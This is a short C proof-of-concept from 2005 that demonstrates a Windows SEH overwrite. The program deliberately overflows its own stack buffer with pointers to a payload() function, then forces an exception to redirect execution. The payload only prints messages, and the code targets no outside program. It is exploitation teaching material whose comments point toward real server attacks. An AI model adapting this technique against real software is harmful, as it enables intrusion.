/*
#######################################################
## Code that will overflow itself overwriting SEH    ##
## and redirecting execution to payload() function   ##
#######################################################
  
  author: simkin
  team: badchecksum
  time frame: 21/6/2005 3:38am 
  contact: aka.simkin@gmail.com
  more: www.badchecksum.tk
*/

#include <windows.h>
#include <stdio.h>

void payload() {
	printf("<__simkin> Exploited succesfully.. :D\n");
	printf("<__simkin> Exiting.. :[\n");
	exit(0);
}

/*
 As we havent installed any exception handlers the app will
fall in the ModuleEntryPoint function SEH.
 Server apps usually install their own handlers so we wont have
to write over important data before SFP in a real 
exploitation scenario*/

//ModuleEntryPoint stack:
						//SEH somewhere..
						//...            
						//RET 4 bytes   
//Main stack:
int main() {			//SFP 4 bytes
	char buf[24];		//24 bytes
	int i;				//4 bytes
	long *ptr;			//4 bytes

	ptr = (long *)&buf;

	/*Overwrite SEH*/
	for(i = 0; i < 24; i++)
		*(ptr ++) = (long) payload;
	
	/*Raise exception*/
	__asm {
      mov eax, 0      
      mov [eax], ecx 
	  //System will look in FS:[0] for SEH and will find it
	  //overwritten by our pointer to payload()
    }

	printf("Im a useless printf since i will never get executed :(\n");
	return 0;
}